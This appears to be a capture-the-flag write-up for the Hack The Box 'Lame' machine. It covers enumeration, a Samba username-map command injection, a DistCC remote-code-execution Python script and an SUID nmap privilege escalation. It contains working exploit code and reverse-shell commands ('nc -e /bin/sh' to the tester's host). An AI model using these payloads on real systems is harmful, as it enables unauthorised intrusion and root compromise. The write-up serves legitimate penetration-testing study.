Hack The Box - Lame Writeup
Hack The Box - Lame
Enumeration
Start with an nmap scan.
Nmap
Nmap scan report for lame.com (10.10.10.3)
Host is up, received user-set (0.26s latency).
Scanned at 2020-06-21 02:01:21 EDT for 582s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 21 02:11:03 2020 -- 1 IP address (1 host up) scanned in 583.83 seconds
We have quite a few attack vectors.
vsftpd 2.3.4
kali@kali:~$ searchsploit vsftpd 2.3.4
kali@kali:~$ searchsploit vsftpd 2.3.4 | cut -b -100
----------------------------------------------------------------------------------------------------
Exploit Title
----------------------------------------------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
----------------------------------------------------------------------------------------------------
Shellcodes: No Result
We have a back door in this version of ftp which can be triggered by sending :) at the end of username. But this exploit failed and did not give a shell.
Method 1 (Samba 3.0.20 Without Metasploit)
smbmap
kali@kali:~/Desktop/htb/lame$ smbmap -H lame.com
[+] Finding open SMB ports....
[+] User SMB session established on lame.com...
[+] IP: lame.com:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
smbmap shows that the share /tmp is accessible. I couldn’t find anything interesting in there. We can also see that the samba version is 3.0.20.
Searchsploit
kali@kali:~$ searchsploit samba 3.0.20 | cut -b -150
------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title
------------------------------------------------------------------------------------------------------------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
Samba < 3.0.20 - Remote Heap Overflow
------------------------------------------------------------------------------------------------------------------------------------------------------
There is a remote code execution vulnerability in this version of samba. And there is an msf exploit for this.
Understanding the metasploit code
Going through the short exploit, we can check the exploit function to see how it works.
def exploit
connect
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
The payload is passed in backticks(which is used to execute commands) within the username with the added nohup command which executes another command, and instructs the system to continue running it even if the session is disconnected. But for some reason it was not working with smbclient. The username was getting capitalized.
We can overcome this by first connecting to smb and then passing the username in the logon command. If you are using kali 2020, you will have to pass the --option='client min protocol=NT1' to smbclient
kali@kali:~/Desktop/htb/lame$ sudo smbclient \\\\lame.com\\tmp --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.34 1337`"
Password:
Wait for a connection using nc
kali@kali:~$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.34] from lame.com [10.10.10.3] 34789
id
uid=0(root) gid=0(root)
We are root!
I also found a python script for exploiting this. We can also achieve root using this script.
Method 2 (DistCC Daemon RCE)
There is a distcc daemon running on port 3632. There is a metasploit module and nmap script available for this.
kali@kali:~/Desktop/htb/lame$ searchsploit distcc | cut -b -150
---------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
DistCC Daemon - Command Execution (Metasploit) | exploits/multiple/remote/9915.rb
---------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Looking at the nmap script we can see how the script creates the payload
local cmds = {
"DIST00000001",
("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " ..
"'(%s)'ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002" ..
"-oARGV00000006main.o"):format(10 + #arg_cmd, arg_cmd),
"DOTI00000001A\n",
}
The length of the command is formated to 8 characters and added before the command.
With the help of this article wrote a python script to exploit it. The output contains some output of the distcc daemon. We have to add a separator before and after our command to strip out the output.
import socket
while True:
cmd = input("cmd>")
# Separator to pull out the output
sep = "sep123"
new_cmd = f"echo -n {sep};{cmd};echo -n {sep}"
payload = f"""DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV{len(new_cmd):8x}{new_cmd}ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI00000001A"""
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('lame.com', 3632))
s.sendall(payload.encode())
print(s.recv(1000).decode().split(sep)[1].strip())
User Shell
Start a nc listener to receive the shell
kali@kali:~/Desktop/htb/lame$ python3 exp.py
cmd>id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
cmd>ls
5194.jsvc_up
distcc_d115ebee.stdout
distcc_d13febee.stderr
distccd_d6bdebee.o
distccd_d6c4ebee.i
cmd>nc -e /bin/sh 10.10.14.34 1337
kali@kali:~/Desktop/htb/lame$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.34] from lame.com [10.10.10.3] 38311
python -c 'import pty;pty.spawn("bash")'
aemon@lame:/tmp$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Root shell
Going through the system we can see that we have an older version of nmap binary with suid bit set. We can use this get shell.
daemon@lame:/tmp$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
92caac**********************
And we are root.
